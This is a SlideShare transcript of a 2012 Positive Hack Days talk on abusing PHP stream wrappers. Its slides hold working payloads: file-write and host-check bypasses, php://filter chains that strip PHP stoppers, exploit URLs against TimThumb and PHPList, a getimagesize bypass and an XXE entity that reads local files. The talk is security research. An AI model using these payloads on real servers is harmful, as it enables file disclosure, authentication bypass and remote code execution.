SlideShare a Scribd company logo

On secure application of PHP wrappers

Download as PPTX, PDF
Positive Hack Days
Positive Hack Days
Technology
1 of 29
PHP Wrappers Aleksey Moskvin Positive Technologies May 2012
Streams Streams
Data reading Wrappers $handle = fopen($file, "rb"); while (!feof($handle)) { $contents .= fread($handle, 8192); } fclose($handle); You can get data not only from local files! $file = 'ftp://user:password@10.0.0.1/pub/file.txt'; $file = „http://127.0.0.1/server-status‟; $file = „php://fd/XXX‟; $file = „expect://ls‟;
Data writing Read the file copy ('/etc/passwd' , 'php://output'); file_put_contents(„php://output', file_get_contents('/etc/hosts')); Modify the file, and then write it to the disk move_uploaded_file($_FILES[“attach”]["tmp_name"], “php://filter/string.rot13/resource=./upload/user_attach”); Write data into Apache error_log (PHP >= 5.3.6) error_log („Bypass root perm!‟, 3, „php://fd/2‟);
Wrapper zip:// Requirements: PHP is compiled with zip support. You can use zip:// wrapper in case allow_url_fopen = Off. zip:// wrapper allows you to access file inside the archive with an arbitrary name. $zip = new ZipArchive; if ($zip->open('/tmp/any_name_zip_arxiv',1) ) { $zip->addFromString( '/my/header.html', '<?php print_r(ini_get_all());„ ); } $zip->close(); print file_get_contents('zip:///tmp/any_name_zip_arxiv#/my/header.html');
NULL Byte Replacement $s = $_POST[„path‟]; include $s.‟/header.html‟; allow_url_include directive restricts the usage of http:// ftp:// data:// wrappers. magic_quotes_gpc directive restricts the usage of NULL byte in local files including. If you can create a zip archive, you can use zip:// wrapper: path=zip:///tmp/any_name_zip_arxiv#/my This is effective if allow_url_fopen=Off and magic_quotes_gpc=On An arbitrary archive name allows you to use temporary files created while content loading. Use hpinfo() to get temporary file path: https://rdot.org/forum/showthread.php?t=1134
Wrapper data:// (RFC 2397) According to RFC 2379, data:// wrapper supports more extended syntax: dataurl := "data:" [ mediatype ] [ ";base64" ] "," data mediatype := [ type "/" subtype ] *( ";" parameter ) data := *urlchar parameter := attribute "=" value Wrapper feature: mediatype can be absent or can be filled in by arbitrary values: data://anytype/anysubtype;myattr!=V@l!;youattr?=Op$;base64
Trick: function stream_get_meta_data Modify array items returned by stream_get_meta_data $password = 'secret'; $file = $_POST['file']; $fp = fopen( $file, 'r'); extract(stream_get_meta_data($fp)); if ( $mediatype === 'text/plain') { ... } if ( $_COOKIE['admin'] === $password) { ... } Rewrite $password variable POST DATA: file=data://text/plain;password=mysecret;base64, Bypass authorization: Cookie: admin=mysecret
Wrapper compress.zlib:// compress.zlib:// wrapper does not modify ordinary file content readfile('compress.zlib:///etc/hosts'); Local file path can include arbitrary folders name $url = 'compress.zlib:///http://../etc/hosts'; if (preg_match('/http:///', $url) == true) { echo "Yes!"; }
Any Data in parse_url parse_url function handles not only URLs $url_info = parse_url($_POST[„src‟]); if ($url_info['host'] === 'img.youtube.com') { $name = str_replace('/', '', substr($url_info['path'], 4)); copy( $src, './'.$name ); } Loading images from img.youtube.com: POST DATA: src=http://img.youtube.com/vi/Uvwfxki7ex4/0.jpg Bypass host name checks and create arbitrary files: POST DATA: src=data://img.youtube.com/aaamy.php?;base64,SSBsb3ZlIFBIUAo Local File Manipulation: POST DATA: src=compress.zlib://img.youtube.com/../path/to/local/file;
Bypass preg_match validate Filter bypass based on preg_match POST DATA: src=data://text/plain;charset=http://w?param=anyval;base64,SSBsb3ZlIFBIUAo POST DATA: src=compress.zlib://youtube.com/../http://?/../../path/to/local/file function validate_url ($url) { $pattern = "/b(?:(?:https?)://|www.)[-a-z0-9+&@#/%?=~_|!:,.;]*[-a-z0-9+&@#/%=~_|]/i"; return preg_match ($pattern, $url); } $src = $_POST['src']; if (!validate_url ($src)) display_error ('invalid url');
Arbitrary File Loading in TimThumb TimThumb is a popular script used for image resize. Public Exploit for v 1.32 (08/2011): http://www.exploit-db.com/exploits/17602 New Wrappers Exploit for v1.34 (revision 145) function check_external ($src) { ………………… if (!validate_url ($src)) display_error ('invalid url'); $url_info = parse_url ($src); ................... if ($url_info['host'] == 'www.youtube.com' || …) parse_str($url_info['query']); .................. $fh = fopen($local_filepath, „w‟); $ch = curl_init($src); ………………….. $files_infos = getimagesize ($local_filepath); if (empty($file_infos[„mime‟]) || …..) unlink($local_filepath); ……………………………… http://www.youtube.com/?local_filepath=php://filter/resource%3D./path/to/.php &url_info[host]=img.youtube.com&src=http://mysite.com/thumb.txt
File Manipulation in TimThumb v1.35 Requirements: curl_init function is diabled on the target server. ………………… if (!$img = file_get_contents ($src)) { display_error ('error....'); } if (file_put_contents ($local_filepath, $img) == FALSE) неопределенного фильтра does not influence the results of other filters { display_error ('error.....'); } ………………… Create a file with arbitrary content: data://img.youtube.com/e;charset=http://w?&var=;base64,SSBsb3ZIIFBIUAo «Read» local file: compress.zlib://youtube.com/../http://?/../../path/to/local/file
Secret features of php://filter wrapper php://filter allows users to filter streams while opening. Filter the file content: readfile('php://filter/read=string.toupper|anyfilter|string.rot13/resource=./file.php'); Unknown filter does not influence the results of other filters. convert.base64-decode and string.strip_tags filters can delete data from the stream. Stephan Esser used convert.base64-decode filter features in an exploit for Piwik in 2009: http://sektioneins.de/en/advisories/advisory-032009-piwik-cookie-unserialize-vulnerability Since 2009, two important questions are not solved: How to delete «unused» data? What are the advantages of filters?
Base64 algorithm: encoding RFC 2045, section 6.8 describes Base64 algorithm. Base64 alphabet: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
Base64 algorithm: decoding While decoding, only characters of base64 alphabet are handled. The input string is divided into parts by 4 characters, every part is handled separately.
Example. “Instrusion” of stopper You can delete some data using base64_decode several times. $content = "; <? die; ?>n"; $content .= "[/Ly8vVTFOQ1RXSXpXbXhKUmtKSlZVRTlQUT09]n"; $file = 'php://filter/write=convert.base64-decode|convert.base64-decode|convert.base64-decode /resource=./PoC'; file_put_contents($file, $content); “Stub”: /Ly8v ( base64_decode('Ly8v') == '///‟ ) convert.base64-decode filter does not handle strings with equal sign in the middle. $s = 'php://filter/read=convert.base64-decode/resource=data:,dGVzdA==CRAP'; var_dump(file_get_contents($s)); // print: string(0) ""
Filter string.strip_tags Filter string.strip_tags speeds up the “extrusion” process $content = "; <? die; ?>n"; $content .= "=3C=3Fprint('PHP');n"; $file = 'php://filter/write=string.strip_tags|convert.quoted-printable-decode/resource=./PoC'; $quoted_printable_lt = '='.strtoupper(dechex(ord('<'))); // =3C file_put_contents($file, $content); convert.quoted-printable-decode filter handles strings symbol by symbol. Characters in Quoted-Printable ( RFC2045, 6.7 chapter) format are modified into characters of 8 bit code page. Modification into Quoted-Printable format. $quoted_printable_lt = '='.strtoupper(dechex(ord('<'))); convert.quoted-printable-decode filter is not effective if the string does not include an equal sign followed by hexadecimal character code. $s = 'php://filter/read=convert.quoted-printable-decode/resource=data:,dGVz=CRAP'; var_dump(file_get_contents($s)); // print: string(0) ""
TextPattern: Upload Arbitrary Files (I) File with .php extension stores information about comments‟ authors. $file = $prefs['tempdir'].DS.'evaluator_trace.php'; if (!file_exists($file)) { $fp = fopen($file, 'wb'); if ($fp) fwrite($fp, "<?php return; ?>n". "This trace-file tracks saved comments. (created ". Пп safe_strftime($prefs['archive_dateformat'],time()).")n". "Format is: Type; Probability; Message “ . “(Type can be -1 => spam, 0 => moderate, 1 => visible)nn");
TextPattern: Upload Arbitrary Files (I)
Partial File Reading in PHPList <= 2.10.13 (I) The reason is a possibility to modify the structure of $_FILES array http://isisblogs.poly.edu/2011/08/11/php-not-properly-checking-params/ if (is_array($_FILES)) { ## only avatars are files foreach ($_FILES['attribute']['name'] as $key => $val) { if (!empty($_FILES['attribute']['name'][$key])) { $tmpnam = $_FILES['attribute']['tmp_name'][$key]; $size = $_FILES['attribute']['size'][$key]; if ($size < MAX_AVATAR_SIZE) { $avatar = file_get_contents($tmpnam); Sql_Query(sprintf('replace into %s (userid,attributeid,value) values(%d,%d,"%s")',$tables["user_attribute"],$id,$key,base64_encode($avatar))); The follow HTML form allows an attacker to upload files into a database. <form action="http://localhost/lists/admin/?page=user&id=1" method="POST” enctype="multipart/form-data" > <input type="file" name="attribute[tmp_name]["> <input type="file" name="attribute[size]["> <input type="file" name="attribute[[tmp_name]"> <input type="file" name="attribute[name]["> <input name="change" value="Save Changes" type="submit"> </form>
Partial File Reading in PHPList <= 2.10.13 (II)
getimagesize check bypass (I) With filters, you manage not only to delete stoppers but also modify images checked on the basis of getimagesize function. If you manage to inject data into EXIF image
getimagesize check bypass (II) extract($_REQUEST); ….. include $templatedir.'/header.html'; ..... if (!empty($_FILES) ) { $file_info = getimagesize($_FILES['image']['tmp_name']); if($file_info['mime'] == 'image/jpeg') { if ( move_uploaded_file( $_FILES['image']['tmp_name'], $folder.'/avatar.jpg') ) ...... Load an image, but a zip archive with /my/header.html file is stored on the server. folder=php://filter/write=string.strip_tags|convert.base64-decode/resource=/tmp/ Add the file into the zip archive templatedir=zip:///tmp/avatar.jpg#/my
Files with arbitrary content If you manage to create a file with arbitrary content, you can: create a session file and exploit the unserialize bug via session_start(); create a zip archive and exploit RFI; create/rewrite files htaccess/htpasswd; create or rewrite templates.
parse_ini_file atack parse_ini_file function handles local files only. session_start(); $_SESSION['admin'] = $_POST['name']; ....... $var = parse_ini_file($inifile); require $var['require']; Create session file /tmp/sess_dffdsdf24gssdgsd90 admin|s:68:"Ly8vVnpOYWFHTnNNRXRqYlZaNFpGZHNlVnBVTUdsTU1sWXdXWGs1YjJJelRqQmplVWs5" With filters, transform the session file into format suitable for parse_ini_file function. php://filter/read=convert.base64-decode|convert.base64-decode| convert.base64-decode/resource= /tmp/sess_dffdsdf24gssdgsd90
XXE Attack Read files via XML Injection. <?xml version='1.0'?> <!DOCTYPE scan [ <!ENTITY test SYSTEM "php://filter/read=convert.base64- encode/resource=http://127.0.0.1/server-status"> ]> <scan>&test;</scan> simplexml_load_file function and DOMDocument::load method supports wrappers.
Limitations for the usage of wrappers By default, you are not allowed to use wrappers in includes with installed Suhosin (even if allow_url_include = On). For example, zip:// wrapper is available as soon as whitelist includes it: suhosin.executor.include.whitelist = “zip” file_exists, is_file, filesize functions return FALSE in case wrappers php://filter, zip://, data:// are used as file names.
Thank you for your attention! Questions?

Recommended

C99[2]
C99[2]C99[2]
C99[2]guest8914af
 
Black Hat: XML Out-Of-Band Data Retrieval
Black Hat: XML Out-Of-Band Data RetrievalBlack Hat: XML Out-Of-Band Data Retrieval
Black Hat: XML Out-Of-Band Data Retrievalqqlan
 
08 php-files
08 php-files08 php-files
08 php-fileshoangphuc2587
 
Intro to php
Intro to phpIntro to php
Intro to phpSp Singh
 
Intro to PHP
Intro to PHPIntro to PHP
Intro to PHPSandy Smith
 
Introducing PHP Data Objects
Introducing PHP Data ObjectsIntroducing PHP Data Objects
Introducing PHP Data Objectswebhostingguy
 
Ch3(working with file)
Ch3(working with file)Ch3(working with file)
Ch3(working with file)Chhom Karath
 
PHP5.5 is Here
PHP5.5 is HerePHP5.5 is Here
PHP5.5 is Herejulien pauli
 

Recommended

C99[2]
C99[2]C99[2]
C99[2]guest8914af
 
Black Hat: XML Out-Of-Band Data Retrieval
Black Hat: XML Out-Of-Band Data RetrievalBlack Hat: XML Out-Of-Band Data Retrieval
Black Hat: XML Out-Of-Band Data Retrievalqqlan
 
08 php-files
08 php-files08 php-files
08 php-fileshoangphuc2587
 
Intro to php
Intro to phpIntro to php
Intro to phpSp Singh
 
Intro to PHP
Intro to PHPIntro to PHP
Intro to PHPSandy Smith
 
Introducing PHP Data Objects
Introducing PHP Data ObjectsIntroducing PHP Data Objects
Introducing PHP Data Objectswebhostingguy
 
Ch3(working with file)
Ch3(working with file)Ch3(working with file)
Ch3(working with file)Chhom Karath
 
PHP5.5 is Here
PHP5.5 is HerePHP5.5 is Here
PHP5.5 is Herejulien pauli
 
Mengembalikan data yang terhapus atau rusak pada hardisk menggunakan ubuntu
Mengembalikan data yang terhapus atau rusak pada hardisk menggunakan ubuntuMengembalikan data yang terhapus atau rusak pada hardisk menggunakan ubuntu
Mengembalikan data yang terhapus atau rusak pada hardisk menggunakan ubuntuAlferizhy Chalter
 
4069180 Caching Performance Lessons From Facebook
4069180 Caching Performance Lessons From Facebook4069180 Caching Performance Lessons From Facebook
4069180 Caching Performance Lessons From Facebookguoqing75
 
Codeigniter4の比較と検証
Codeigniter4の比較と検証Codeigniter4の比較と検証
Codeigniter4の比較と検証ME iBotch
 
PHP 5.3 Overview
PHP 5.3 OverviewPHP 5.3 Overview
PHP 5.3 Overviewjsmith92
 
Lesson 9. The Apache Web Server
Lesson 9. The Apache Web ServerLesson 9. The Apache Web Server
Lesson 9. The Apache Web Serverwebhostingguy
 
extending-php
extending-phpextending-php
extending-phptutorialsruby
 
関西PHP勉強会 php5.4つまみぐい
関西PHP勉強会 php5.4つまみぐい関西PHP勉強会 php5.4つまみぐい
関西PHP勉強会 php5.4つまみぐいHisateru Tanaka
 
Perforce Object and Record Model
Perforce Object and Record Model Perforce Object and Record Model
Perforce Object and Record Model Perforce
 
Php tips-and-tricks4128
Php tips-and-tricks4128Php tips-and-tricks4128
Php tips-and-tricks4128PrinceGuru MS
 
Cod
CodCod
CodStan Adrian
 
mapserver_install_linux
mapserver_install_linuxmapserver_install_linux
mapserver_install_linuxtutorialsruby
 
Twas the night before Malware...
Twas the night before Malware...Twas the night before Malware...
Twas the night before Malware...DoktorMandrake
 
Perl basics for pentesters part 2
Perl basics for pentesters part 2Perl basics for pentesters part 2
Perl basics for pentesters part 2n|u - The Open Security Community
 
SPL: The Missing Link in Development
SPL: The Missing Link in DevelopmentSPL: The Missing Link in Development
SPL: The Missing Link in Developmentjsmith92
 
PSR-7 and PSR-15, why can't you ignore them
PSR-7 and PSR-15, why can't you ignore themPSR-7 and PSR-15, why can't you ignore them
PSR-7 and PSR-15, why can't you ignore themSérgio Rafael Siqueira
 
eZ Publish Cluster Unleashed
eZ Publish Cluster UnleashedeZ Publish Cluster Unleashed
eZ Publish Cluster UnleashedBertrand Dunogier
 
Drupal 8 configuration management
Drupal 8 configuration managementDrupal 8 configuration management
Drupal 8 configuration managementAlexander Tkachev
 
Configuration Surgery with Augeas
Configuration Surgery with AugeasConfiguration Surgery with Augeas
Configuration Surgery with AugeasPuppet
 
Augeas @RMLL 2012
Augeas @RMLL 2012Augeas @RMLL 2012
Augeas @RMLL 2012Raphaël PINSON
 
eZ Publish cluster unleashed revisited
eZ Publish cluster unleashed revisitedeZ Publish cluster unleashed revisited
eZ Publish cluster unleashed revisitedBertrand Dunogier
 
vfsStream - effective filesystem mocking
vfsStream - effective filesystem mocking vfsStream - effective filesystem mocking
vfsStream - effective filesystem mocking Sebastian Marek
 
AWS Hadoop and PIG and overview
AWS Hadoop and PIG and overviewAWS Hadoop and PIG and overview
AWS Hadoop and PIG and overviewDan Morrill
 

More Related Content

What's hot

Mengembalikan data yang terhapus atau rusak pada hardisk menggunakan ubuntu
Mengembalikan data yang terhapus atau rusak pada hardisk menggunakan ubuntuMengembalikan data yang terhapus atau rusak pada hardisk menggunakan ubuntu
Mengembalikan data yang terhapus atau rusak pada hardisk menggunakan ubuntuAlferizhy Chalter
 
4069180 Caching Performance Lessons From Facebook
4069180 Caching Performance Lessons From Facebook4069180 Caching Performance Lessons From Facebook
4069180 Caching Performance Lessons From Facebookguoqing75
 
Codeigniter4の比較と検証
Codeigniter4の比較と検証Codeigniter4の比較と検証
Codeigniter4の比較と検証ME iBotch
 
PHP 5.3 Overview
PHP 5.3 OverviewPHP 5.3 Overview
PHP 5.3 Overviewjsmith92
 
Lesson 9. The Apache Web Server
Lesson 9. The Apache Web ServerLesson 9. The Apache Web Server
Lesson 9. The Apache Web Serverwebhostingguy
 
関西PHP勉強会 php5.4つまみぐい
関西PHP勉強会 php5.4つまみぐい関西PHP勉強会 php5.4つまみぐい
関西PHP勉強会 php5.4つまみぐいHisateru Tanaka
 
Perforce Object and Record Model
Perforce Object and Record Model Perforce Object and Record Model
Perforce Object and Record Model Perforce
 
Php tips-and-tricks4128
Php tips-and-tricks4128Php tips-and-tricks4128
Php tips-and-tricks4128PrinceGuru MS
 
mapserver_install_linux
mapserver_install_linuxmapserver_install_linux
mapserver_install_linuxtutorialsruby
 
Twas the night before Malware...
Twas the night before Malware...Twas the night before Malware...
Twas the night before Malware...DoktorMandrake
 
SPL: The Missing Link in Development
SPL: The Missing Link in DevelopmentSPL: The Missing Link in Development
SPL: The Missing Link in Developmentjsmith92
 
PSR-7 and PSR-15, why can't you ignore them
PSR-7 and PSR-15, why can't you ignore themPSR-7 and PSR-15, why can't you ignore them
PSR-7 and PSR-15, why can't you ignore themSérgio Rafael Siqueira
 

What's hot (15)

Mengembalikan data yang terhapus atau rusak pada hardisk menggunakan ubuntu
Mengembalikan data yang terhapus atau rusak pada hardisk menggunakan ubuntuMengembalikan data yang terhapus atau rusak pada hardisk menggunakan ubuntu
Mengembalikan data yang terhapus atau rusak pada hardisk menggunakan ubuntu
 
4069180 Caching Performance Lessons From Facebook
4069180 Caching Performance Lessons From Facebook4069180 Caching Performance Lessons From Facebook
4069180 Caching Performance Lessons From Facebook
 
Codeigniter4の比較と検証
Codeigniter4の比較と検証Codeigniter4の比較と検証
Codeigniter4の比較と検証
 
PHP 5.3 Overview
PHP 5.3 OverviewPHP 5.3 Overview
PHP 5.3 Overview
 
Lesson 9. The Apache Web Server
Lesson 9. The Apache Web ServerLesson 9. The Apache Web Server
Lesson 9. The Apache Web Server
 
extending-php
extending-phpextending-php
extending-php
 
関西PHP勉強会 php5.4つまみぐい
関西PHP勉強会 php5.4つまみぐい関西PHP勉強会 php5.4つまみぐい
関西PHP勉強会 php5.4つまみぐい
 
Perforce Object and Record Model
Perforce Object and Record Model Perforce Object and Record Model
Perforce Object and Record Model
 
Php tips-and-tricks4128
Php tips-and-tricks4128Php tips-and-tricks4128
Php tips-and-tricks4128
 
Cod
CodCod
Cod
 
mapserver_install_linux
mapserver_install_linuxmapserver_install_linux
mapserver_install_linux
 
Twas the night before Malware...
Twas the night before Malware...Twas the night before Malware...
Twas the night before Malware...
 
Perl basics for pentesters part 2
Perl basics for pentesters part 2Perl basics for pentesters part 2
Perl basics for pentesters part 2
 
SPL: The Missing Link in Development
SPL: The Missing Link in DevelopmentSPL: The Missing Link in Development
SPL: The Missing Link in Development
 
PSR-7 and PSR-15, why can't you ignore them
PSR-7 and PSR-15, why can't you ignore themPSR-7 and PSR-15, why can't you ignore them
PSR-7 and PSR-15, why can't you ignore them
 

Similar to On secure application of PHP wrappers

eZ Publish Cluster Unleashed
eZ Publish Cluster UnleashedeZ Publish Cluster Unleashed
eZ Publish Cluster UnleashedBertrand Dunogier
 
Drupal 8 configuration management
Drupal 8 configuration managementDrupal 8 configuration management
Drupal 8 configuration managementAlexander Tkachev
 
Configuration Surgery with Augeas
Configuration Surgery with AugeasConfiguration Surgery with Augeas
Configuration Surgery with AugeasPuppet
 
eZ Publish cluster unleashed revisited
eZ Publish cluster unleashed revisitedeZ Publish cluster unleashed revisited
eZ Publish cluster unleashed revisitedBertrand Dunogier
 
vfsStream - effective filesystem mocking
vfsStream - effective filesystem mocking vfsStream - effective filesystem mocking
vfsStream - effective filesystem mocking Sebastian Marek
 
AWS Hadoop and PIG and overview
AWS Hadoop and PIG and overviewAWS Hadoop and PIG and overview
AWS Hadoop and PIG and overviewDan Morrill
 
vfsStream - a better approach for file system dependent tests
vfsStream - a better approach for file system dependent testsvfsStream - a better approach for file system dependent tests
vfsStream - a better approach for file system dependent testsFrank Kleine
 
Building Lithium Apps
Building Lithium AppsBuilding Lithium Apps
Building Lithium AppsNate Abele
 
Lithium: The Framework for People Who Hate Frameworks, Tokyo Edition
Lithium: The Framework for People Who Hate Frameworks, Tokyo EditionLithium: The Framework for People Who Hate Frameworks, Tokyo Edition
Lithium: The Framework for People Who Hate Frameworks, Tokyo EditionNate Abele
 
Advanced symfony Techniques
Advanced symfony TechniquesAdvanced symfony Techniques
Advanced symfony TechniquesKris Wallsmith
 
PHP Without PHP—Confoo
PHP Without PHP—ConfooPHP Without PHP—Confoo
PHP Without PHP—Confooterry chay
 
Symfony internals [english]
Symfony internals [english]Symfony internals [english]
Symfony internals [english]Raul Fraile
 

Similar to On secure application of PHP wrappers (20)

eZ Publish Cluster Unleashed
eZ Publish Cluster UnleashedeZ Publish Cluster Unleashed
eZ Publish Cluster Unleashed
 
Drupal 8 configuration management
Drupal 8 configuration managementDrupal 8 configuration management
Drupal 8 configuration management
 
Configuration Surgery with Augeas
Configuration Surgery with AugeasConfiguration Surgery with Augeas
Configuration Surgery with Augeas
 
Augeas @RMLL 2012
Augeas @RMLL 2012Augeas @RMLL 2012
Augeas @RMLL 2012
 
eZ Publish cluster unleashed revisited
eZ Publish cluster unleashed revisitedeZ Publish cluster unleashed revisited
eZ Publish cluster unleashed revisited
 
vfsStream - effective filesystem mocking
vfsStream - effective filesystem mocking vfsStream - effective filesystem mocking
vfsStream - effective filesystem mocking
 
AWS Hadoop and PIG and overview
AWS Hadoop and PIG and overviewAWS Hadoop and PIG and overview
AWS Hadoop and PIG and overview
 
Tutorial Puppet
Tutorial PuppetTutorial Puppet
Tutorial Puppet
 
Frontend Servers and NGINX: What, Where and How
Frontend Servers and NGINX: What, Where and HowFrontend Servers and NGINX: What, Where and How
Frontend Servers and NGINX: What, Where and How
 
vfsStream - a better approach for file system dependent tests
vfsStream - a better approach for file system dependent testsvfsStream - a better approach for file system dependent tests
vfsStream - a better approach for file system dependent tests
 
extending-php
extending-phpextending-php
extending-php
 
extending-php
extending-phpextending-php
extending-php
 
extending-php
extending-phpextending-php
extending-php
 
extending-php
extending-phpextending-php
extending-php
 
extending-php
extending-phpextending-php
extending-php
 
Building Lithium Apps
Building Lithium AppsBuilding Lithium Apps
Building Lithium Apps
 
Lithium: The Framework for People Who Hate Frameworks, Tokyo Edition
Lithium: The Framework for People Who Hate Frameworks, Tokyo EditionLithium: The Framework for People Who Hate Frameworks, Tokyo Edition
Lithium: The Framework for People Who Hate Frameworks, Tokyo Edition
 
Advanced symfony Techniques
Advanced symfony TechniquesAdvanced symfony Techniques
Advanced symfony Techniques
 
PHP Without PHP—Confoo
PHP Without PHP—ConfooPHP Without PHP—Confoo
PHP Without PHP—Confoo
 
Symfony internals [english]
Symfony internals [english]Symfony internals [english]
Symfony internals [english]
 

More from Positive Hack Days

Инструмент ChangelogBuilder для автоматической подготовки Release Notes
Инструмент ChangelogBuilder для автоматической подготовки Release NotesИнструмент ChangelogBuilder для автоматической подготовки Release Notes
Инструмент ChangelogBuilder для автоматической подготовки Release NotesPositive Hack Days
 
Как мы собираем проекты в выделенном окружении в Windows Docker
Как мы собираем проекты в выделенном окружении в Windows DockerКак мы собираем проекты в выделенном окружении в Windows Docker
Как мы собираем проекты в выделенном окружении в Windows DockerPositive Hack Days
 
Типовая сборка и деплой продуктов в Positive Technologies
Типовая сборка и деплой продуктов в Positive TechnologiesТиповая сборка и деплой продуктов в Positive Technologies
Типовая сборка и деплой продуктов в Positive TechnologiesPositive Hack Days
 
Аналитика в проектах: TFS + Qlik
Аналитика в проектах: TFS + QlikАналитика в проектах: TFS + Qlik
Аналитика в проектах: TFS + QlikPositive Hack Days
 
Использование анализатора кода SonarQube
Использование анализатора кода SonarQubeИспользование анализатора кода SonarQube
Использование анализатора кода SonarQubePositive Hack Days
 
Развитие сообщества Open DevOps Community
Развитие сообщества Open DevOps CommunityРазвитие сообщества Open DevOps Community
Развитие сообщества Open DevOps CommunityPositive Hack Days
 
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...Positive Hack Days
 
Автоматизация построения правил для Approof
Автоматизация построения правил для ApproofАвтоматизация построения правил для Approof
Автоматизация построения правил для ApproofPositive Hack Days
 
Мастер-класс «Трущобы Application Security»
Мастер-класс «Трущобы Application Security»Мастер-класс «Трущобы Application Security»
Мастер-класс «Трущобы Application Security»Positive Hack Days
 
Формальные методы защиты приложений
Формальные методы защиты приложенийФормальные методы защиты приложений
Формальные методы защиты приложенийPositive Hack Days
 
Эвристические методы защиты приложений
Эвристические методы защиты приложенийЭвристические методы защиты приложений
Эвристические методы защиты приложенийPositive Hack Days
 
Теоретические основы Application Security
Теоретические основы Application SecurityТеоретические основы Application Security
Теоретические основы Application SecurityPositive Hack Days
 
От экспериментального программирования к промышленному: путь длиной в 10 лет
От экспериментального программирования к промышленному: путь длиной в 10 летОт экспериментального программирования к промышленному: путь длиной в 10 лет
От экспериментального программирования к промышленному: путь длиной в 10 летPositive Hack Days
 
Уязвимое Android-приложение: N проверенных способов наступить на грабли
Уязвимое Android-приложение: N проверенных способов наступить на граблиУязвимое Android-приложение: N проверенных способов наступить на грабли
Уязвимое Android-приложение: N проверенных способов наступить на граблиPositive Hack Days
 
Требования по безопасности в архитектуре ПО
Требования по безопасности в архитектуре ПОТребования по безопасности в архитектуре ПО
Требования по безопасности в архитектуре ПОPositive Hack Days
 
Формальная верификация кода на языке Си
Формальная верификация кода на языке СиФормальная верификация кода на языке Си
Формальная верификация кода на языке СиPositive Hack Days
 
Механизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET CoreМеханизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET CorePositive Hack Days
 
SOC для КИИ: израильский опыт
SOC для КИИ: израильский опытSOC для КИИ: израильский опыт
SOC для КИИ: израильский опытPositive Hack Days
 
Honeywell Industrial Cyber Security Lab & Services Center
Honeywell Industrial Cyber Security Lab & Services CenterHoneywell Industrial Cyber Security Lab & Services Center
Honeywell Industrial Cyber Security Lab & Services CenterPositive Hack Days
 
Credential stuffing и брутфорс-атаки
Credential stuffing и брутфорс-атакиCredential stuffing и брутфорс-атаки
Credential stuffing и брутфорс-атакиPositive Hack Days
 

More from Positive Hack Days (20)

Инструмент ChangelogBuilder для автоматической подготовки Release Notes
Инструмент ChangelogBuilder для автоматической подготовки Release NotesИнструмент ChangelogBuilder для автоматической подготовки Release Notes
Инструмент ChangelogBuilder для автоматической подготовки Release Notes
 
Как мы собираем проекты в выделенном окружении в Windows Docker
Как мы собираем проекты в выделенном окружении в Windows DockerКак мы собираем проекты в выделенном окружении в Windows Docker
Как мы собираем проекты в выделенном окружении в Windows Docker
 
Типовая сборка и деплой продуктов в Positive Technologies
Типовая сборка и деплой продуктов в Positive TechnologiesТиповая сборка и деплой продуктов в Positive Technologies
Типовая сборка и деплой продуктов в Positive Technologies
 
Аналитика в проектах: TFS + Qlik
Аналитика в проектах: TFS + QlikАналитика в проектах: TFS + Qlik
Аналитика в проектах: TFS + Qlik
 
Использование анализатора кода SonarQube
Использование анализатора кода SonarQubeИспользование анализатора кода SonarQube
Использование анализатора кода SonarQube
 
Развитие сообщества Open DevOps Community
Развитие сообщества Open DevOps CommunityРазвитие сообщества Open DevOps Community
Развитие сообщества Open DevOps Community
 
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
 
Автоматизация построения правил для Approof
Автоматизация построения правил для ApproofАвтоматизация построения правил для Approof
Автоматизация построения правил для Approof
 
Мастер-класс «Трущобы Application Security»
Мастер-класс «Трущобы Application Security»Мастер-класс «Трущобы Application Security»
Мастер-класс «Трущобы Application Security»
 
Формальные методы защиты приложений
Формальные методы защиты приложенийФормальные методы защиты приложений
Формальные методы защиты приложений
 
Эвристические методы защиты приложений
Эвристические методы защиты приложенийЭвристические методы защиты приложений
Эвристические методы защиты приложений
 
Теоретические основы Application Security
Теоретические основы Application SecurityТеоретические основы Application Security
Теоретические основы Application Security
 
От экспериментального программирования к промышленному: путь длиной в 10 лет
От экспериментального программирования к промышленному: путь длиной в 10 летОт экспериментального программирования к промышленному: путь длиной в 10 лет
От экспериментального программирования к промышленному: путь длиной в 10 лет
 
Уязвимое Android-приложение: N проверенных способов наступить на грабли
Уязвимое Android-приложение: N проверенных способов наступить на граблиУязвимое Android-приложение: N проверенных способов наступить на грабли
Уязвимое Android-приложение: N проверенных способов наступить на грабли
 
Требования по безопасности в архитектуре ПО
Требования по безопасности в архитектуре ПОТребования по безопасности в архитектуре ПО
Требования по безопасности в архитектуре ПО
 
Формальная верификация кода на языке Си
Формальная верификация кода на языке СиФормальная верификация кода на языке Си
Формальная верификация кода на языке Си
 
Механизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET CoreМеханизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET Core
 
SOC для КИИ: израильский опыт
SOC для КИИ: израильский опытSOC для КИИ: израильский опыт
SOC для КИИ: израильский опыт
 
Honeywell Industrial Cyber Security Lab & Services Center
Honeywell Industrial Cyber Security Lab & Services CenterHoneywell Industrial Cyber Security Lab & Services Center
Honeywell Industrial Cyber Security Lab & Services Center
 
Credential stuffing и брутфорс-атаки
Credential stuffing и брутфорс-атакиCredential stuffing и брутфорс-атаки
Credential stuffing и брутфорс-атаки
 

Recently uploaded

Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxMaking_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
